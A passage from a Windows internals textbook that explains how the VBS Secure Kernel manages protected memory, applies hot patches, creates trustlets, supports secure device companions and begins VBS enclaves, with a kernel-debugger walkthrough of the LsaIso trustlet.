including user mode images used for trustlets) loaded in VTL 0. Boot-loaded
drivers do not use the SECURE_IMAGE data structure because they are
treated by the NT memory manager as private pages that contain executable
code. The latter data structure contains information regarding a loaded image
in the NT kernel (which is verified by SKCI), like the address of its entry
point, a copy of its relocation tables (used also for dealing with Retpoline and
Import Optimization), the pointer to its shared prototype PTEs, hot-patch
information, and a data structure that specifies the authorized use of its
memory pages. The SECURE_IMAGE data structure is very important
because it’s used by the Secure Kernel to track and verify the shared memory
pages that are used by runtime drivers.
For tracking VTL 0 kernel private pages, the Secure Kernel uses the NTE
data structure. An NTE exists for every virtual page in the VTL 0 address
space that requires supervision from the Secure Kernel; it’s often used for
private pages. An NTE tracks a VTL 0 virtual page’s PTE and stores the
page state and protection. When HVCI is enabled, the NTE table divides all
the virtual pages between privileged and non-privileged. A privileged page
represents a memory page that the NT kernel is not able to touch on its own
because it’s protected through SLAT and usually corresponds to an
executable page or to a kernel CFG read-only page. A nonprivileged page
represents all the other types of memory pages that the NT kernel has full
control over. The Secure Kernel uses invalid NTEs to represent
nonprivileged pages. When HVCI is off, all the private pages are
nonprivileged (the NT kernel has full control of all its pages indeed).
In HVCI-enabled systems, the NT memory manager can’t modify any
protected pages. Otherwise, an EPT violation exception will raise in the
hypervisor, resulting in a system crash. After those systems complete their
boot phase, the Secure Kernel has already processed all the nonexecutable
physical pages by SLAT-protecting them only for read and write access. In
this scenario, new executable pages can be allocated only if the target code
has been verified by Secure HVCI.
When the system, an application, or the Plug and Play manager require the
loading of a new runtime driver, a complex procedure starts that involves the
NT and the Secure Kernel memory manager, summarized here:
1.
The NT memory manager creates a section object, allocates and fills a
new Control area (more details about the NT memory manager are
available in Chapter 5 of Part 1), reads the first page of the binary,
and calls the Secure Kernel with the goal to create the relative secure
image, which describe the new loaded module.
2.
The Secure Kernel creates the SECURE_IMAGE data structure,
parses all the sections of the binary file, and fills the secure prototype
PTEs array.
3.
The NT kernel reads the entire binary in nonexecutable shared
memory (pointed by the prototype PTEs of the control area). Calls the
Secure Kernel, which, using Secure HVCI, cycles between each
section of the binary image and calculates the final image hash.
4.
If the calculated file hash matches the one stored in the digital
signature, the NT memory walks the entire image and for each page
calls the Secure Kernel, which validates the page (each page hash has
been already calculated in the previous phase), applies the needed
relocations (ASLR, Retpoline, and Import Optimization), and applies
the new SLAT protection, allowing the page to be executable but not
writable anymore.
5.
The Section object has been created. The NT memory manager needs
to map the driver in its address space. It calls the Secure Kernel for
allocating the needed privileged PTEs for describing the driver’s
virtual address range. The Secure Kernel creates the NAR data
structure. It then maps the physical pages of the driver, which have
been previously verified, using the MiMapSystemImage routine.
Note
When a NARs is initialized for a runtime driver, part of the NTE table is
filled for describing the new driver address space. The NTEs are not used
for keeping track of a runtime driver’s virtual address range (its virtual
pages are shared and not private), so the relative part of the NT address
table is filled with invalid “reserved” NTEs.
While VTL 0 kernel virtual address ranges are represented using the NAR
data structure, the Secure Kernel uses secure VADs (virtual address
descriptors) to track user-mode virtual addresses in VTL 1. Secure VADs are
created every time a new private virtual allocation is made, a binary image is
mapped in the address space of a trustlet (secure process), and when a VBS-
enclave is created or a module is mapped into its address space. A secure
VAD is similar to the NT kernel VAD and contains a descriptor of the VA
range, a reference counter, some flags, and a pointer to the Secure section,
which has been created by SKCI. (The secure section pointer is set to 0 in
case of secure VADs describing private virtual allocations.) More details
about Trustlets and VBS-based enclaves will be discussed later in this
chapter.
Page identity and the secure PFN database
After a driver is loaded and mapped correctly into VTL 0 memory, the NT
memory manager needs to be able to manage its memory pages (for various
reasons, like the paging out of a pageable driver’s section, the creation of
private pages, the application of private fixups, and so on; see Chapter 5 in
Part 1 for more details). Every time the NT memory manager operates on
protected memory, it needs the cooperation of the Secure Kernel. Two main
kinds of secure services are offered to the NT memory manager for operating
with privileged memory: protected pages copy and protected pages removal.
A PAGE_IDENTITY data structure is the glue that allows the Secure
Kernel to keep track of all the different kinds of pages. The data structure is
composed of two fields: an Address Context and a Virtual Address. Every
time the NT kernel calls the Secure Kernel for operating on privileged pages,
it needs to specify the physical page number along with a valid
PAGE_IDENTITY data structure describing what the physical page is used
for. Through this data structure, the Secure Kernel can verify the requested
page usage and decide whether to allow the request.
Table 9-4 shows the PAGE_IDENTITY data structure (second and third
columns), and all the types of verification performed by the Secure Kernel on
different memory pages:
■ If the Secure Kernel receives a request to copy or to release a shared
executable page of a runtime driver, it validates the secure image
handle (specified by the caller) and gets its relative data structure
(SECURE_IMAGE). It then uses the relative virtual address (RVA) as
an index into the secure prototype array to obtain the physical page
frame (PFN) of the driver’s shared page. If the found PFN is equal to
the caller’s specified one, the Secure Kernel allows the request;
otherwise it blocks it.
■ In a similar way, if the NT kernel requests to operate on a trustlet or
an enclave page (more details about trustlets and secure enclaves are
provided later in this chapter), the Secure Kernel uses the caller’s
specified virtual address to verify that the secure PTE in the secure
process page table contains the correct PFN.
■ As introduced earlier in the section ”The Secure Kernel memory
manager” , for private kernel pages, the Secure Kernel locates the
NTE starting from the caller’s specified virtual address and verifies
that it contains a valid PFN, which must be the same as the caller’s
specified one.
■ Placeholder pages are free pages that are SLAT protected. The Secure
Kernel verifies the state of a placeholder page by using the PFN
database.
Table 9-4 Different page identities managed by the Secure Kernel
Page
Type
Address
Context
Virtual Address
Verification
Structure
Kernel
Shared
Secure
Image
Handle
RVA of the page
Secure Prototype
PTE
Trustlet/
Enclave
Secure
Process
Handle
Virtual Address of the
Secure Process
Secure PTE
Kernel
Private
0
Kernel Virtual
Address of the page
NT address table
entry (NTE)
Placehol
der
0
0
PFN entry
The Secure Kernel memory manager maintains a PFN database to
represent the state of each physical page. A PFN entry in the Secure Kernel is
much smaller compared to its NT equivalent; it basically contains the page
state and the share counter. A physical page, from the Secure Kernel
perspective, can be in one of the following states: invalid, free, shared, I/O,
secured, or image (secured NT private).
The secured state is used for physical pages that are private to the Secure
Kernel (the NT kernel can never claim them) or for physical pages that have
been allocated by the NT kernel and later SLAT-protected by the Secure
Kernel for storing executable code verified by Secure HVCI. Only secured
nonprivate physical pages have a page identity.
When the NT kernel is going to page out a protected page, it asks the
Secure Kernel for a page removal operation. The Secure Kernel analyzes the
specified page identity and does its verification (as explained earlier). In case
the page identity refers to an enclave or a trustlet page, the Secure Kernel
encrypts the page’s content before releasing it to the NT kernel, which will
then store the page in the paging file. In this way, the NT kernel still has no
chance to intercept the real content of the private memory.
Secure memory allocation
As discussed in previous sections, when the Secure Kernel initially starts, it
parses the firmware’s memory descriptor lists, with the goal of being able to
allocate physical memory for its own use. In phase 1 of its initialization, the
Secure Kernel can’t use the memory services provided by the NT kernel (the
NT kernel indeed is still not initialized), so it uses free entries of the
firmware’s memory descriptor lists for reserving 2-MB SLABs. A SLAB is a
2-MB contiguous physical memory, which is mapped by a single nested page
table directory entry in the hypervisor. All the SLAB pages have the same
SLAT protection. SLABs have been designed for performance
considerations. By mapping a 2-MB chunk of physical memory using a
single nested page entry in the hypervisor, the additional hardware memory
address translation is faster and results in less cache misses on the SLAT
table.
The first Secure Kernel page bundle is filled with 1 MB of the allocated
SLAB memory. A page bundle is the data structure shown in Figure 9-37,
which contains a list of contiguous free physical page frame numbers (PFNs).
When the Secure Kernel needs memory for its own purposes, it allocates
physical pages from a page bundle by removing one or more free page
frames from the tail of the bundle’s PFNs array. In this case, the Secure
Kernel doesn’t need to check the firmware memory descriptors list until the
bundle has been entirely consumed. When the phase 3 of the Secure Kernel
initialization is done, memory services of the NT kernel become available,
and so the Secure Kernel frees any boot memory descriptor lists, retaining
physical memory pages previously located in bundles.
Figure 9-37 A secure page bundle with 80 available pages. A bundle is
composed of a header and a free PFNs array.
Future secure memory allocations use normal calls provided by the NT
kernel. Page bundles have been designed to minimize the number of normal
calls needed for memory allocation. When a bundle gets fully allocated, it
contains no pages (all its pages are currently assigned), and a new one will be
generated by asking the NT kernel for 1 MB of contiguous physical pages
(through the ALLOC_PHYSICAL_PAGES normal call). The physical
memory will be allocated by the NT kernel from the proper SLAB.
In the same way, every time the Secure Kernel frees some of its private
memory, it stores the corresponding physical pages in the correct bundle by
growing its PFN array until the limit of 256 free pages. When the array is
entirely filled, and the bundle becomes free, a new work item is queued. The
work item will zero-out all the pages and will emit a
FREE_PHYSICAL_PAGES normal call, which ends up in executing the
MmFreePagesFromMdl function of the NT memory manager.
Every time enough pages are moved into and out of a bundle, they are
fully protected in VTL 0 by using the SLAT (this procedure is called
“securing the bundle”). The Secure Kernel supports three kinds of bundles,
which all allocate memory from different SLABs: No access, Read-only, and
Read-Execute.
Hot patching
Several years ago, the 32-bit versions of Windows were supporting the hot
patch of the operating-system’s components. Patchable functions contained a
redundant 2-byte opcode in their prolog and some padding bytes located
before the function itself. This allowed the NT kernel to dynamically replace
the initial opcode with an indirect jump, which uses the free space provided
by the padding, to divert the code to a patched function residing in a different
module. The feature was heavily used by Windows Update, which allowed
the system to be updated without the need for an immediate reboot of the
machine. When moving to 64-bit architectures, this was no longer possible
due to various problems. Kernel patch protection was a good example; there
was no longer a reliable way to modify a protected kernel mode binary and to
allow PatchGuard to be updated without exposing some of its private
interfaces, and exposed PatchGuard interfaces could have been easily
exploited by an attacker with the goal to defeat the protection.
The Secure Kernel has solved all the problems related to 64-bit
architectures and has reintroduced to the OS the ability of hot patching kernel
binaries. While the Secure Kernel is enabled, the following types of
executable images can be hot patched:
■ VTL 0 user-mode modules (both executables and libraries)
■ Kernel mode drivers, HAL, and the NT kernel binary, protected or not
by PatchGuard
■ The Secure Kernel binary and its dependent modules, which run in
VTL 1 Kernel mode
■ The hypervisor (Intel, AMD, and the ARM version).
Patch binaries created for targeting software running in VTL 0 are called
normal patches, whereas the others are called secure patches. If the Secure
Kernel is not enabled, only user mode applications can be patched.
A hot patch image is a standard Portable Executable (PE) binary that
includes the hot patch table, the data structure used for tracking the patch
functions. The hot patch table is linked in the binary through the image load
configuration data directory. It contains one or more descriptors that describe
each patchable base image, which is identified by its checksum and time date
stamp. (In this way, a hot patch is compatible only with the correct base
images. The system can’t apply a patch to the wrong image.) The hot patch
table also includes a list of functions or global data chunks that needs to be
updated in the base or in the patch image; we describe the patch engine
shortly. Every entry in this list contains the functions’ offsets in the base and
patch images and the original bytes of the base function that will be replaced.
Multiple patches can be applied to a base image, but the patch application
is idempotent. The same patch may be applied multiple times, or different
patches may be applied in sequence. Regardless, the last applied patch will
be the active patch for the base image. When the system needs to apply a hot
patch, it uses the NtManageHotPatch system call, which is employed to
install, remove, or manage hot patches. (The system call supports different
“patch information” classes for describing all the possible operations.) A hot
patch can be installed globally for the entire system, or, if a patch is for user
mode code (VTL 0), for all the processes that belong to a specific user
session.
When the system requests the application of a patch, the NT kernel locates
the hot patch table in the patch binary and validates it. It then uses the
DETERMINE_HOT_PATCH_TYPE secure call to securely determine the
type of patch. In the case of a secure patch, only the Secure Kernel can apply
it, so the APPLY_HOT_PATCH secure call is used; no other processing by
the NT kernel is needed. In all the other cases, the NT kernel first tries to
apply the patch to a kernel driver. It cycles between each loaded kernel
module, searching for a base image that has the same checksum described by
one of the patch image’s hot patch descriptors.
Hot patching is enabled only if the
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\Memory Management\HotPatchTableSize registry value is a
multiple of a standard memory page size (4,096). Indeed, when hot patching
is enabled, every image that is mapped in the virtual address space needs to
have a certain amount of virtual address space reserved immediately after the
image itself. This reserved space is used for the image’s hot patch address
table (HPAT, not to be confused with the hot patch table). The HPAT is used
to minimize the amount of padding necessary for each function to be patched
by storing the address of the new function in the patched image. When
patching a function, the HPAT location will be used to perform an indirect
jump from the original function in the base image to the patched function in
the patch image (note that for Retpoline compatibility, another kind of
Retpoline routine is used instead of an indirect jump).
When the NT kernel finds a kernel mode driver suitable for the patch, it
loads and maps the patch binary in the kernel address space and creates the
related loader data table entry (for more details, see Chapter 12). It then scans
each memory page of both the base and the patch images and locks in
memory the ones involved in the hot patch (this is important; in this way, the
pages can’t be paged out to disk while the patch application is in progress). It
finally emits the APPLY_HOT_PATCH secure call.
The real patch application process starts in the Secure Kernel. The latter
captures and verifies the hot patch table of the patch image (by remapping
the patch image also in VTL 1) and locates the base image’s NAR (see the
previous section, “The Secure Kernel memory manager” for more details
about the NARs), which also tells the Secure Kernel whether the image is
protected by PatchGuard. The Secure Kernel then verifies whether enough
reserved space is available in the image HPAT. If so, it allocates one or more
free physical pages (getting them from the secure bundle or using the
ALLOC_PHYSICAL_PAGES normal call) that will be mapped in the
reserved space. At this point, if the base image is protected, the Secure
Kernel starts a complex process that updates the PatchGuard’s internal state
for the new patched image and finally calls the patch engine.
The kernel’s patch engine performs the following high-level operations,
which are all described by a different entry type in the hot patch table:
1.
Patches all calls from patched functions in the patch image with the
goal to jump to the corresponding functions in the base image. This
ensures that all unpatched code always executes in the original base
image. For example, if function A calls B in the base image and the
patch changes function A but not function B, then the patch engine
will update function B in the patch to jump to function B in the base
image.
2.
Patches the necessary references to global variables in patched
functions to point to the corresponding global variables in the base
image.
3.
Patches the necessary import address table (IAT) references in the
patch image by copying the corresponding IAT entries from the base
image.
4.
Atomically patches the necessary functions in the base image to jump
to the corresponding function in the patch image. As soon as this is
done for a given function in the base image, all new invocations of
that function will execute the new patched function code in the patch
image. When the patched function returns, it will return to the caller
of the original function in the base image.
Since the pointers of the new functions are 64 bits (8 bytes) wide, the
patch engine inserts each pointer in the HPAT, which is located at the end of
the binary. In this way, it needs only 5 bytes for placing the indirect jump in
the padding space located in the beginning of each function (the process has
been simplified. Retpoline compatible hot-patches requires a compatible
Retpoline. Furthermore, the HPAT is split in code and data page).
As shown in Figure 9-38, the patch engine is compatible with different
kinds of binaries. If the NT kernel has not found any patchable kernel mode
module, it restarts the search through all the user mode processes and applies
a procedure similar to properly hot patching a compatible user mode
executable or library.
Figure 9-38 A schema of the hot patch engine executing on different types
of binaries.
Isolated User Mode
Isolated User Mode (IUM), the services provided by the Secure Kernel to its
secure processes (trustlets), and the trustlets general architecture are covered
in Chapter 3 of Part 1. In this section, we continue the discussion starting
from there, and we move on to describe some services provided by the
Isolated User Mode, like the secure devices and the VBS enclaves.
As introduced in Chapter 3 of Part 1, when a trustlet is created in VTL 1, it
usually maps in its address space the following libraries:
■ Iumdll.dll The IUM Native Layer DLL implements the secure system
call stub. It’s the equivalent of Ntdll.dll of VTL 0.
■ Iumbase.dll The IUM Base Layer DLL is the library that implements
most of the secure APIs that can be consumed exclusively by VTL 1
software. It provides various services to each secure process, like
secure identification, communication, cryptography, and secure
memory management. Trustlets do not usually call secure system
calls directly, but they pass through Iumbase.dll, which is the
equivalent of kernelbase.dll in VTL 0.
■ IumCrypt.dll Exposes public/private key encryption functions used
for signing and integrity verification. Most of the crypto functions
exposed to VTL 1 are implemented in Iumbase.dll; only a small
number of specialized encryption routines are implemented in
IumCrypt. LsaIso is the main consumer of the services exposed by
IumCrypt, which is not loaded in many other trustlets.
■ Ntdll.dll, Kernelbase.dll, and Kernel32.dll A trustlet can be
designed to run both in VTL 1 and VTL 0. In that case, it should only
use routines implemented in the standard VTL 0 API surface. Not all
the services available to VTL 0 are also implemented in VTL 1. For
example, a trustlet can never do any registry I/O and any file I/O, but
it can use synchronization routines, ALPC, thread APIs, and
structured exception handling, and it can manage virtual memory and
section objects. Almost all the services offered by the kernelbase and
kernel32 libraries perform system calls through Ntdll.dll. In VTL 1,
these kinds of system calls are “translated” in normal calls and
redirected to the VTL 0 kernel. (We discussed normal calls in detail
earlier in this chapter.) Normal calls are often used by IUM functions
and by the Secure Kernel itself. This explains why ntdll.dll is always
mapped in every trustlet.
■ Vertdll.dll The VSM enclave runtime DLL is the DLL that manages
the lifetime of a VBS enclave. Only limited services are provided by
software executing in a secure enclave. This library implements all
the enclave services exposed to the software enclave and is normally
not loaded for standard VTL 1 processes.
With this knowledge in mind, let’s look at what is involved in the trustlet
creation process, starting from the CreateProcess API in VTL 0, for which
its execution flow has already been described in detail in Chapter 3.
Trustlets creation
As discussed multiple times in the previous sections, the Secure Kernel
depends on the NT kernel for performing various operations. Creating a
trustlet follows the same rule: It is an operation that is managed by both the
Secure Kernel and NT kernel. In Chapter 3 of Part 1, we presented the trustlet
structure and its signing requirement, and we described its important policy
metadata. Furthermore, we described the detailed flow of the CreateProcess
API, which is still the starting point for the trustlet creation.
To properly create a trustlet, an application should specify the
CREATE_SECURE_PROCESS creation flag when calling the CreateProcess
API. Internally, the flag is converted to the PS_CP_SECURE_ PROCESS NT
attribute and passed to the NtCreateUserProcess native API. After the
NtCreateUserProcess has successfully opened the image to be executed, it
creates the section object of the image by specifying a special flag, which
instructs the memory manager to use the Secure HVCI to validate its content.
This allows the Secure Kernel to create the SECURE_IMAGE data structure
used to describe the PE image verified through Secure HVCI.
The NT kernel creates the required process’s data structures and initial
VTL 0 address space (page directories, hyperspace, and working set) as for
normal processes, and if the new process is a trustlet, it emits a
CREATE_PROCESS secure call. The Secure Kernel manages the latter by
creating the secure process object and relative data structure (named
SEPROCESS). The Secure Kernel links the normal process object
(EPROCESS) with the new secure one and creates the initial secure address
space by allocating the secure page table and duplicating the root entries that
describe the kernel portion of the secure address space in the upper half of it.
The NT kernel concludes the setup of the empty process address space and
maps the Ntdll library into it (see Stage 3D of Chapter 3 of Part 1 for more
details). When doing so for secure processes, the NT kernel invokes the
INITIALIZE_PROCESS secure call to finish the setup in VTL 1. The Secure
Kernel copies the trustlet identity and trustlet attributes specified at process
creation time into the new secure process, creates the secure handle table, and
maps the secure shared page into the address space.
The last step needed for the secure process is the creation of the secure
thread. The initial thread object is created as for normal processes in the NT
kernel: When the NtCreateUserProcess calls PspInsertThread, it has already
allocated the thread kernel stack and inserted the necessary data to start from
the KiStartUserThread kernel function (see Stage 4 in Chapter 3 of Part 1 for
further details). If the process is a trustlet, the NT kernel emits a
CREATE_THREAD secure call for performing the final secure thread
creation. The Secure Kernel attaches to the new secure process’s address
space and allocates and initializes a secure thread data structure, a thread’s
secure TEB, and kernel stack. The Secure Kernel fills the thread’s kernel
stack by inserting the thread-first initial kernel routine: SkpUserThreadStart.
It then initializes the machine-dependent hardware context for the secure
thread, which specifies the actual image start address and the address of the
first user mode routine. Finally, it associates the normal thread object with
the new created secure one, inserts the thread into the secure threads list, and
marks the thread as runnable.
When the normal thread object is selected to run by the NT kernel
scheduler, the execution still starts in the KiStartUserThread function in VTL
0. The latter lowers the thread’s IRQL and calls the system initial thread
routine (PspUserThreadStartup). The execution proceeds as for normal
threads, until the NT kernel sets up the initial thunk context. Instead of doing
that, it starts the Secure Kernel dispatch loop by calling the
VslpEnterIumSecureMode routine and specifying the RESUMETHREAD
secure call. The loop will exit only when the thread is terminated. The initial
secure call is processed by the normal call dispatcher loop in VTL 1, which
identifies the “resume thread” entry reason to VTL 1, attaches to the new
process’s address space, and switches to the new secure thread stack. The
Secure Kernel in this case does not call the IumInvokeSecureService
dispatcher function because it knows that the initial thread function is on the
stack, so it simply returns to the address located in the stack, which points to
the VTL 1 secure initial routine, SkpUserThreadStart.
SkpUserThreadStart, similarly to standard VTL 0 threads, sets up the
initial thunk context to run the image loader initialization routine
(LdrInitializeThunk in Ntdll.dll), as well as the system-wide thread startup
stub (RtlUserThreadStart in Ntdll.dll). These steps are done by editing the
context of the thread in place and then issuing an exit from system service
operation, which loads the specially crafted user context and returns to user
mode. The newborn secure thread initialization proceeds as for normal VTL
0 threads; the LdrInitializeThunk routine initializes the loader and its needed
data structures. Once the function returns, NtContinue restores the new user
context. Thread execution now truly starts: RtlUserThreadStart uses the
address of the actual image entry point and the start parameter and calls the
application’s entry point.
Note
A careful reader may have noticed that the Secure Kernel doesn’t do
anything to protect the new trustlet’s binary image. This is because the
shared memory that describes the trustlet’s base binary image is still
accessible to VTL 0 by design.
Let’s assume that a trustlet wants to write private data located in the
image’s global data. The PTEs that map the writable data section of the
image global data are marked as copy-on-write. So, an access fault will be
generated by the processor. The fault belongs to a user mode address
range (remember that no NAR are used to track shared pages). The Secure
Kernel page fault handler transfers the execution to the NT kernel
(through a normal call), which will allocate a new page, copy the content
of the old one in it, and protect it through the SLAT (using a protected
copy operation; see the section “The Secure Kernel memory manager”
earlier in this chapter for further details).
EXPERIMENT: Debugging a trustlet
Debugging a trustlet with a user mode debugger is possible only if
the trustlet explicitly allows it through its policy metadata (stored in
the .tPolicy section). In this experiment, we try to debug a trustlet
through the kernel debugger. You need a kernel debugger attached
to a test system (a local kernel debugger works, too), which must
have VBS enabled. HVCI is not strictly needed, though.
First, find the LsaIso.exe trustlet:
Click here to view code image
lkd> !process 0 0 lsaiso.exe
PROCESS ffff8904dfdaa080
SessionId: 0 Cid: 02e8 Peb: 8074164000 ParentCid:
0250
DirBase: 3e590002 ObjectTable: ffffb00d0f4dab00
HandleCount: 42.
Image: LsaIso.exe
Analyzing the process’s PEB reveals that some information is
set to 0 or nonreadable:
Click here to view code image
lkd> .process /P ffff8904dfdaa080
lkd> !peb 8074164000
PEB at 0000008074164000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: No
ImageBaseAddress: 00007ff708750000
NtGlobalFlag: 0
NtGlobalFlag2: 0
Ldr 0000000000000000
*** unable to read Ldr table at 0000000000000000
SubSystemData: 0000000000000000
ProcessHeap: 0000000000000000
ProcessParameters: 0000026b55a10000
CurrentDirectory: 'C:\Windows\system32\'
WindowTitle: '< Name not readable >'
ImageFile: '\??\C:\Windows\system32\lsaiso.exe'
CommandLine: '\??\C:\Windows\system32\lsaiso.exe'
DllPath: '< Name not readable >'lkd
Reading from the process image base address may succeed, but
it depends on whether the LsaIso image mapped in the VTL 0
address space has been already accessed. This is usually the case
just for the first page (remember that the shared memory of the
main image is accessible in VTL 0). In our system, the first page is
mapped and valid, whereas the third one is invalid:
Click here to view code image
lkd> db 0x7ff708750000 l20
00007ff7`08750000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff 00
00 MZ..............
00007ff7`08750010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00
00 00 ........@.......
lkd> db (0x7ff708750000 + 2000) l20
00007ff7`08752000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ??
?? ?? ????????????????
00007ff7`08752010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ??
?? ?? ????????????????
lkd> !pte (0x7ff708750000 + 2000)
1: kd> !pte (0x7ff708750000 + 2000)
VA
00007ff708752000
PXE at FFFFD5EAF57AB7F8 PPE at FFFFD5EAF56FFEE0 PDE at
FFFFD5EADFFDC218
contains 0A0000003E58D867 contains 0A0000003E58E867
contains 0A0000003E58F867
pfn 3e58d ---DA--UWEV pfn 3e58e ---DA--UWEV pfn
3e58f ---DA--UWEV
PTE at FFFFD5BFFB843A90
contains 00000000000000
not valid
Dumping the process’s threads reveals important information
that confirms what we have discussed in the previous sections:
Click here to view code image
!process ffff8904dfdaa080 2
PROCESS ffff8904dfdaa080
SessionId: 0 Cid: 02e8 Peb: 8074164000 ParentCid:
0250
DirBase: 3e590002 ObjectTable: ffffb00d0f4dab00
HandleCount: 42.
Image: LsaIso.exe
THREAD ffff8904dfdd9080 Cid 02e8.02f8 Teb:
0000008074165000
Win32Thread: 0000000000000000 WAIT: (UserRequest)
UserMode Non-Alertable
ffff8904dfdc5ca0 NotificationEvent
THREAD ffff8904e12ac040 Cid 02e8.0b84 Teb:
0000008074167000
Win32Thread: 0000000000000000 WAIT: (WrQueue)
UserMode Alertable
ffff8904dfdd7440 QueueObject
lkd> .thread /p ffff8904e12ac040
Implicit thread is now ffff8904`e12ac040
Implicit process is now ffff8904`dfdaa080
.cache forcedecodeuser done
lkd> k
*** Stack trace for last set context - .thread/.cxr resets
it
# Child-SP RetAddr Call Site
00 ffffe009`1216c140 fffff801`27564e17 nt!KiSwapContext+0x76
01 ffffe009`1216c280 fffff801`27564989 nt!KiSwapThread+0x297
02 ffffe009`1216c340 fffff801`275681f9
nt!KiCommitThreadWait+0x549
03 ffffe009`1216c3e0 fffff801`27567369
nt!KeRemoveQueueEx+0xb59
04 ffffe009`1216c480 fffff801`27568e2a
nt!IoRemoveIoCompletion+0x99
05 ffffe009`1216c5b0 fffff801`2764d504
nt!NtWaitForWorkViaWorkerFactory+0x99a
06 ffffe009`1216c7e0 fffff801`276db75f
nt!VslpDispatchIumSyscall+0x34
07 ffffe009`1216c860 fffff801`27bab7e4
nt!VslpEnterIumSecureMode+0x12098b
08 ffffe009`1216c8d0 fffff801`276586cc
nt!PspUserThreadStartup+0x178704
09 ffffe009`1216c9c0 fffff801`27658640
nt!KiStartUserThread+0x1c
0a ffffe009`1216cb00 00007fff`d06f7ab0
nt!KiStartUserThreadReturn
0b 00000080`7427fe18 00000000`00000000
ntdll!RtlUserThreadStart
The stack clearly shows that the execution begins in VTL 0 at
the KiStartUserThread routine. PspUserThreadStartup has
invoked the secure call dispatch loop, which never ended and has
been interrupted by a wait operation. There is no way for the kernel
debugger to show any Secure Kernel’s data structures or trustlet’s
private data.
Secure devices
VBS provides the ability for drivers to run part of their code in the secure
environment. The Secure Kernel itself can’t be extended to support kernel
drivers; its attack surface would become too large. Furthermore, Microsoft
wouldn’t allow external companies to introduce possible bugs in a
component used primarily for security purposes.
The User-Mode Driver Framework (UMDF) solves the problem by
introducing the concept of driver companions, which can run both in user
mode VTL 0 or VTL 1. In this case, they take the name of secure
companions. A secure companion takes the subset of the driver’s code that
needs to run in a different mode (in this case IUM) and loads it as an
extension, or companion, of the main KMDF driver. Standard WDM drivers
are also supported, though. The main driver, which still runs in VTL 0 kernel
mode, continues to manage the device’s PnP and power state, but it needs the
ability to reach out to its companion to perform tasks that must be performed
in IUM.
Although the Secure Driver Framework (SDF) mentioned in Chapter 3 is
deprecated, Figure 9-39 shows the architecture of the new UMDF secure
companion model, which is still built on top of the same UMDF core
framework (Wudfx02000.dll) used in VTL 0 user mode. The latter leverages
services provided by the UMDF secure companion host
(WUDFCompanionHost.exe) for loading and managing the driver
companion, which is distributed through a DLL. The UMDF secure
companion host manages the lifetime of the secure companion and
encapsulates many UMDF functions that deal specifically with the IUM
environment.
Figure 9-39 The WDF driver’s secure companion architecture.
A secure companion usually comes associated with the main driver that
runs in the VTL 0 kernel. It must be properly signed (including the IUM
EKU in the signature, as for every trustlet) and must declare its capabilities in
its metadata section. A secure companion has the full ownership of its
managed device (this explains why the device is often called secure device).
A secure device controller by a secure companion supports the following
features:
■ Secure DMA The driver can instruct the device to perform DMA
transfer directly in protected VTL 1 memory, which is not accessible
to VTL 0. The secure companion can process the data sent or received
through the DMA interface and can then transfer part of the data to
the VTL 0 driver through the standard KMDF communication
interface (ALPC). The IumGetDmaEnabler and IumDmaMapMemory
secure system calls, exposed through Iumbase.dll, allow the secure
companion to map physical DMA memory ranges directly in VTL 1
user mode.
■ Memory mapped IO (MMIO) The secure companion can request
the device to map its accessible MMIO range in VTL 1 (user mode).
It can then access the memory-mapped device’s registers directly in
IUM. MapSecureIo and the ProtectSecureIo APIs expose this feature.
■ Secure sections The companion can create (through the
CreateSecureSection API) and map secure sections, which represent
memory that can be shared between trustlets and the main driver
running in VTL 0. Furthermore, the secure companion can specify a
different type of SLAT protection in case the memory is accessed
through the secure device (via DMA or MMIO).
A secure companion can’t directly respond to device interrupts, which
need to be mapped and managed by the associated kernel mode driver in
VTL 0. In the same way, the kernel mode driver still needs to act as the high-
level interface for the system and user mode applications by managing all the
received IOCTLs. The main driver communicates with its secure companion
by sending WDF tasks using the UMDF Task Queue object, which internally
uses the ALPC facilities exposed by the WDF framework.
A typical KMDF driver registers its companion via INF directives. WDF
automatically starts the driver’s companion in the context of the driver’s call
to WdfDeviceCreate—which, for plug and play drivers usually happens in
the AddDevice callback— by sending an ALPC message to the UMDF
driver manager service, which spawns a new WUDFCompanionHost.exe
trustlet by calling the NtCreateUserProcess native API. The UMDF secure
companion host then loads the secure companion DLL in its address space.
Another ALPC message is sent from the UMDF driver manager to the
WUDFCompanionHost, with the goal to actually start the secure companion.
The DriverEntry routine of the companion performs the driver’s secure
initialization and creates the WDFDRIVER object through the classic
WdfDriverCreate API.
The framework then calls the AddDevice callback routine of the
companion in VTL 1, which usually creates the companion’s device through
the new WdfDeviceCompanionCreate UMDF API. The latter transfers the
execution to the Secure Kernel (through the IumCreateSecureDevice secure
system call), which creates the new secure device. From this point on, the
secure companion has full ownership of its managed device. Usually, the first
thing that the companion does after the creation of the secure device is to
create the task queue object (WDFTASKQUEUE) used to process any
incoming tasks delivered by its associated VTL 0 driver. The execution
control returns to the kernel mode driver, which can now send new tasks to
its secure companion.
This model is also supported by WDM drivers. WDM drivers can use the
KMDF’s miniport mode to interact with a special filter driver,
WdmCompanionFilter.sys, which is attached in a lower-level position of the
device’s stack. The Wdm Companion filter allows WDM drivers to use the
task queue object for sending tasks to the secure companion.
VBS-based enclaves
In Chapter 5 of Part 1, we discuss the Software Guard Extension (SGX), a
hardware technology that allows the creation of protected memory enclaves,
which are secure zones in a process address space where code and data are
protected (encrypted) by the hardware from code running outside the enclave.
The technology, which was first introduced in the sixth generation Intel Core
processors (Skylake), has suffered from some problems that prevented its
broad adoption. (Furthermore, AMD released another technology called
Secure Encrypted Virtualization, which is not compatible with SGX.)
To overcome these issues, Microsoft released VBS-based enclaves, which
are secure enclaves whose isolation guarantees are provided using the VSM
infrastructure. Code and data inside of a VBS-based enclave is visible only to
the enclave itself (and the VSM Secure Kernel) and is inaccessible to the NT
kernel, VTL 0 processes, and secure trustlets running in the system.
A secure VBS-based enclave is created by establishing a single virtual
address range within a normal process. Code and data are then loaded into
the enclave, after which the enclave is entered for the first time by
transferring control to its entry point via the Secure Kernel. The Secure
Kernel first verifies that all code and data are authentic and are authorized to
run inside the enclave by using image signature verification on the enclave
image. If the signature checks pass, then the execution control is transferred
to the enclave entry point, which has access to all of the enclave’s code and
